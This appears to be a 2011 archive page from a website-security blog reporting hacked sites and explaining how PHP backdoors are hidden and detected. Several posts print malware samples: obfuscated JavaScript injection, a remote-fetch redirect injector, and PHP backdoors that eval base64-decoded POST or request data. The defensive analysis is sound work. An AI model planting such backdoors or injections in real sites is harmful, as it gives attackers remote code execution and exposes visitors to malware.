Archives for September 2011 Hacked (Javascript Malware)

It looks like the website is currently hacked and compromised with a JavaScript malware (and serving malware to anyone visiting it).

Our scanner identified the malware as mwjs159 which is often related to stolen FTP passwords. So it looks like one of their developers got their desktop compromised and had his password stolen. From our scanner:

So the compromised file was and we recommend that you do not visit the site right now. We will post more details as we learn more about it…

(Seems that fixed it already)Try view-source: if you want to see the malicious code on the site. It starts as:

String.fromCharCode;};Object.prototype.asd="e";var s="";try{{}["qwtqwt"]
();}catch(q){if(q)r=1;}if(r&&+new Object(1231)&&document.createTextNode("123")
.data&&typeof{}.asd.vfr===’undefined’)n=2;e=eval;m=[18/n,18/n,210/n,204/n,64/n,80/n,200/n, 222/n, 198/n, 234/n, 218/n, 202/n, 220/n, 232/n, 92/n, 206/n, 202/n,232/n, …

Update: It seems that fixed it already.

Mass compromise at

Thousands of sites were defaced today at InMotion hosting. The defacement was made by “TiGER-M@TE” and all of the affected sites showed the following text:

Server   Hacked   By   TiGER-M@TE

According to zone-h, they defaced at least 1,000 sites, and a list of the attacked sites can be viewed here:

*It seems that some of the compromised sites were also at (both owned by the same company)
**We are tracking more than 10k sites already defaced.
***Update from their in their Twitter account: “inmotionhosting InMotion Hosting
Security team members have traced this vulnerability to an authentication system and are working to patch this now. “

Mass Spam Infection From Wplinksforwork Dot Com (50k+ WordPress Sites Hacked)

Last year we spoke about the siteurlpath blackhat SEO attack that was infecting many WordPress sites with spam.

But, how many? We had no clue at the time. Today, we decided to check on Google and it seems that almost 50k (yes, fifty thousand sites) were compromised, at minimum…

How do we know this? Well, the attack consists of contacting the domain to get a list of links to be displayed on the compromised sites. However, that domain has been down for the last few days and all the sites compromised (if they have display errors enabled), have this message in their footer:

Warning: file_get_contents( 47509328/p.php?host=… failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in ..

Read More

Website Getting Redirected? It Might Have Something To Do With Moneygram-tracking Dot Com

Have you ever tried to visit your site and you got redirected to a different site? Maybe some external news page that had nothing to do with your site? Then have you tried to visit it again to test and it worked properly?

Over the last few days we’ve been getting this question often and it means that your site has been hacked and compromised. Basically the attackers added a code similar to this to your site:

$url = “”.$_SERVER[‘REMOTE_ADDR’].”&useragent=”.urlencode($_SERVER[‘HTTP_USER_AGENT’]).”&referer=”.urlencode($_SERVER[“HTTP_REFERER”]);
$answer = file_get_contents($url);
if (strpos($answer,”noredirect”) === false) {
echo $answer;

Read More

TimThumb.php backdoor

If your site got compromised lately with the TimThumb.php vulnerability, make sure to check that script to see if it was not modified to act as a backdoor as well.

We are seeing in many sites the timthumb.php with the following code added to it:

if (md5 (md5($_POST[‘p’]))===’xxx8ab2ab.. a4ec61072xxx’)
die (eval ( base64_decode ($_POST[‘c’])));

If you are not sure what this code does, it receives a password via the “p” POST and if it is correct, it executes any PHP code sent by the attackers in the “c” POST variable.

For more details on the timthumb.php vulnerability, check our multiple posts about it: here. For more information about backdoors, we did a nice post about them: ASK Sucuri: What about the backdoors?

GoDaddy shared servers compromised – .htaccess redirection to

We are seeing many sites hosted on GoDaddy shared servers getting compromised today (and for the last few days) with a conditional redirection to This is what it looks like on our scanner:

Suspicious conditional redirect.
Redirects users to:

This is caused by this entry that is added to the .htaccess file of the compromised sites:

Read More

ASK Sucuri: What about the backdoors?

If you have any question about malware, blacklisting, or security in general, send it to us: and we will answer here. For all the “ask sucuri” answers, go here.

Question: What about the backdoors? Why are they so hard to find? How do you guys find them?

When a site gets compromised, one thing we know for sure is that the attackers will leave some piece of malware in there to allow them access back to the site. We call this type of malware, backdoors.

Backdoors are very hard to find because they don’t have to be linked anywhere in the site, they can be very small and be easily confused with “normal” code. Some of them have passwords, some are heavily encrypted/encoded and can be anywhere in your site.

On most online forums, people tell you to search for “eval (base64_decode” and things like that to identify hidden backdoors, but that’s likely not to find everything (and your site will just get reinfected).

For example, on the latest oscommerce compromises, all the sites had the following code added to the application_top.php file:

if (isset($_REQUEST[‘asc’])) eval(stripslashes($_REQUEST[‘asc’]));

Yes, that is a backdoor. It allows the attacker to execute any type of code, add files, remove files, etc. When you are analysing thousands of lines of code, it is easy to miss it.

What about this one:


What you think? Yes, another backdoor, but this time the bulk of it is hidden inside an image (void.jpg). See what we mean, by being hard to detect and search for?

Fun Quiz: Find the backdoor?

Since backdoors can be in any type or shape, let’s look at some examples:

The “Filesman” backdoor, big, complex and easy to find:

$auth_pass = “63a9f0ea7bb98050796b649e85481845”;
$color = “#df5”;
$default_action = “SQL”;
$default_charset = “Windows-1251”;
$protectionoffer = “ficken”;
preg_replace(“/.*/e”,”x65x76x61x6C.. hundreds more lines..

Another simple backdoor, executing any code from the “php” request:

eval (base64_decode($_POST[“php”]));

A WordPress-based backdoor. This time, the bad content is hidden inside the database (wp-options tables)

return @eval(get_option(‘blogopt1’));

A messy backdoor we are seeing in the latest timthumb.php attacks. On this case, all the variables are completely random per case and per file:

>function aknhtkmml3($ur5){$dtuq=’$u’;$pnt=’e6′;$p5zy=’r’;$xcl4=’e(‘;$feuh=’od’;$qjka=’dec’;$rhi=’$u’;
return $ur5;}$sk25=’M3JffC1WcjMrVi1fVHVOKDpoTSIoMGJUNzdXLVZyMytWX1R1Tig6a…

Another messy one. Do you know how the code is executed there? Preg_replace with the “e” modifier actually acts like an “eval”:

$llllllll=’ZnVuY3Rpb24gZnVu3STVFNmxObm1V… LONG LINE of code.. dXBoQmRxemtuRE1SSXJwdjUwd3NWUUhrWmV3dWFKbHUvZzVpc1JKa0M1TWF2RFVMV1cwUG1XKzJF
$lllllllll=pack(‘H*’, ‘406576616c286261736536345f6465636f646528′).’$llllllll))’;
preg_replace($llllll, $lllllllll, $lllllll);

Searching for base64_decode? Well, what happens when the attackers do this:

<?php $XKsyG=’as’;$RqoaUO=’e’;$ygDOEJ=$XZKsyG.’s’.$RqoaUO.’r’.’t’;$joEDdb

And those are just some simple examples…


So, how to find backdoors?

Finding them is very hard, but inside Sucuri we were able to come up with some techniques that work very well:

  1. White listing. We know how the good files look like. We have a large checksum set of all the core WordPress, Joomla, osCommerce, Wiki, etc, etc files. We also have the checksum for the most popular plugins, modules, extensions and themes. Do you know what that gives us? We know right away if any of the core files were modified (or a new one added) and we can ignore safely the good ones.
  2. Black listing. We also have a list with thousands of backdoors (and their variations) that we have been finding in the last few years.
  3. Anomaly checks. When a file is not in our white list (core files) and not in our blacklist, we do our anomaly checks, where all the functions/variables are analysed and manually inspected to see if they are a backdoor. If it is, we modify our blacklists to catch them in the future, if not, another file to our white list…

So we mix white listing + blacklisting and our own manual analysis to find all the backdoors in a site. If you are trying to clean a compromised site by your self, we recommend first overwriting all the files you can (core files, plugins, etc). Of what is left, you have to analyse manually to make sure it is clean…

What do you think? I would love to hear other ideas to identify backdoors that you guys are using.

Need someone to secure and clean a hacked site? Sign up with us here: http://sucuri,net/signup.

Ascio Registrar Compromised – Brings Down, Theregister and Others

If you tried to visit today the sites for,, Vodafone, The Daily Telegraph and some other high profile sites, you would have received a scary message saying that they’ve been hacked (by turkguvenligi):

And they were indeed hacked, but not in the way most people think. Their servers were not compromised, in fact it had nothing to do with their sites., a domain registrar (used by all of them) was hacked, which lead to the DNS servers of those sites to be modified to:

Read More